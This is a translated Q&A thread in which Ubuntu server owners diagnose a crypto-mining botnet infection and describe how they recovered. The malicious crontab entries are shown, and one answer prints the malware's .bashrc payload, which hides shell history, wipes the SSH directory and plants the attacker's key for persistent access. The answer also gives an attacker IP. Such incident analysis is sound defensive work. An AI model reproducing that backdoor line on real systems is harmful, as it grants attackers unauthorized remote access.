我不断收到 weir cron 作业,但我不知道它们在做什么。我通常发出 kill -9 来停止它们。它们占用了我 100% 的 CPU,并且可以运行数天,直到我检查为止。有人知道这是什么意思吗?
sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1
我正在运行 Ubuntu 18 LTS 服务器,截至昨天 2019 年 7 月 24 日,该服务器已完全更新
更新
我很感谢大家的反馈。我已经断开了所有数据和应用程序驱动器,因为唯一受到影响的是操作系统驱动器,至少我做得很正确。我打算进行彻底重建,使用更安全和更安全的方法。
答案1
您的机器很可能感染了加密矿工。您可以看到其他人报告了类似的文件名和行为使用安全中心对 Azure 中的虚拟机进行实际检测。 也可以看看我的 Ubuntu 服务器感染了病毒...我找到了它,但我无法清除它...在 Reddit 上。
您不再信任该机器,应重新安装。恢复备份时请小心谨慎。
答案2
您的机器已感染加密矿工攻击。我过去也曾面临过类似的勒索软件攻击,我的数据库遭到了入侵。我对机器进行了 SQL 转储并重新配置了机器(因为我的机器是托管在 AWS EC2 上的 VM)。我还修改了机器的安全组以锁定 SSH 访问和修改密码。我还启用了日志记录以记录查询并将其每晚导出到 S3。
答案3
我也有同样的情况,昨天才注意到。我检查了文件/var/log/syslog
,这个 IP(185.234.218.40)似乎正在自动执行 cronjobs。
我检查过了http://whatismyipaddress.com(https://whatismyipaddress.com/ip/185.234.218.40),并有一些报告。这些文件被该木马编辑过:
- .bashrc
- .ssh/授权密钥
我在末尾发现了这一点.bashrc
(每次打开 bash 时都会执行):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
它会删除你的authorized_keys
文件,该文件是允许无需密码连接的 SSH 密钥列表。然后,它会添加攻击者的 SSH 密钥:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
此外,我还发现了这个文件夹:/tmp/.X13-unix/.rsync
,里面有所有的恶意软件。我甚至还发现了一个文件,,/tmp/.X13-unix/.rsync/c/ip
里面有 70 000 个 IP 地址,这些地址很可能是其他受害者或节点服务器。
有2个解决方案:A:
添加防火墙,阻止除端口 22 和其他你认为必要的端口之外的所有传出连接,并启用 fail2ban,这是一个在 X 次密码尝试失败后禁止 IP 地址的程序
终止所有 cron 作业:
ps aux | grep cron
,然后终止出现的 PID将密码更改为安全密码
乙:
备份您需要或想要的任何文件或文件夹
重置服务器并重新安装Ubuntu,或者直接创建一个新的droplet
就像 Thom Wiggers 所说的那样,你肯定是比特币挖矿僵尸网络的一部分,而且你的服务器有后门。后门利用了 perl 漏洞,文件位于此处:
/tmp/.X13-unix/.rsync/b/run
,包含以下内容(https://pastebin.com/ceP2jsUy)
我发现最可疑的文件夹是:
/tmp/.X13-unix/.rsync
~/.bashrc
(已编辑)~/.firefoxcatche
最后,这里有一篇与 Perl 后门相关的文章: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
希望这个对你有帮助。
答案4
昨天我也遇到了同样的情况。PC 风扇意外启动,我发现一个名为 ./kswapd0 的命令消耗了 60% 的 CPU 资源。该进程属于临时普通用户,与交换无关;它可能是恶意软件。我的初始步骤是:
- 在互联网上搜索命令行“./kswapd0”
- 发现许多答案建议关闭交换
- 不适用,因为该系统不使用交换
- 终止有问题的进程
- 更改用户密码
- 隔离受影响用户拥有的所有文件,将其移动到新目录并进行故障排除
- 检查临时用户自感染以来创建的其他文件
- 继续检查文件系统中自那时以来创建的所有文件
- 删除受影响的用户:
sudo userdel testuser
- 通过消息观察失败情况
userdel: user testuser is currently used by process <pid>
- 列出该过程的详细信息:
ps -l <pid>
- 观察结果中的命令行:
/lib/systemd/systemd --user
- 观察结果中的命令行:
- 列出与受影响用户相关的 systemd 单元:
sudo systemctl | grep testuser
- 观察带有会话名称的打印输出:
session-<sn>.scope
- 观察带有会话名称的打印输出:
- 检查会话状态:
sudo systemctl status session-<sn>.scope
- 观察子进程命名
rsync
- 观察子进程命名
- 停止受影响用户下运行的所有进程:
sudo killall -u testuser
- 停止为受影响的用户打开的会话:
sudo systemctl stop session-<sn>.scope
- 观察会议圆满闭幕
testuser
- 观察会议圆满闭幕
- 重新尝试删除用户:
sudo userdel testuser
- 观察成功移除
testuser
- 观察成功移除
- 通过消息观察失败情况
正是植入的 ssh 授权密钥中令人讨厌的注释词,让我找到了非常有用的答案https://askubuntu.com/a/1162138/848863以上。我还找到了除“.*catche”之外的所有文件和目录;感谢您的确认。一句脏话和一个拼写错误就足以说明这是在搞鬼。
此次入侵是由于内部测试时猜测错误选择的弱密码而发生的,这是出乎意料的。
幸运的是,损害似乎仅限于临时测试用户的足迹。我没有注意到任何系统日志或文件的清除,但会继续关注。